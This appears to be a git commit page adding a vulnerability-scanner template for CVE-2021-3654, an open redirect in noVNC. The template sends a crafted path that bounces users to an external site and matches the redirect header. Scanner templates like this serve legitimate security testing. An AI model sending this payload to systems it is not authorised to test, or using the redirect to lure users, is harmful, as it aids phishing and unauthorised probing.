Create CVE-2021-3654.yaml

patch-1
Geeknik Labs 2021-09-27 20:53:50 -05:00 committed by GitHub
parent b7eaa213ee
commit 2b635a352e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: CVE-2021-3654
info:
name: noVNC Open Redirect
author: geeknik
severity: low
description: A user-controlled input redirects noVNC users to an external website.
tags: redirect,novnc,cve,cve2021
requests:
- method: GET
path:
- '{{BaseURL}}//example.com/%2f..'
matchers-condition: and
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header
- type: status
status:
- 302
- 301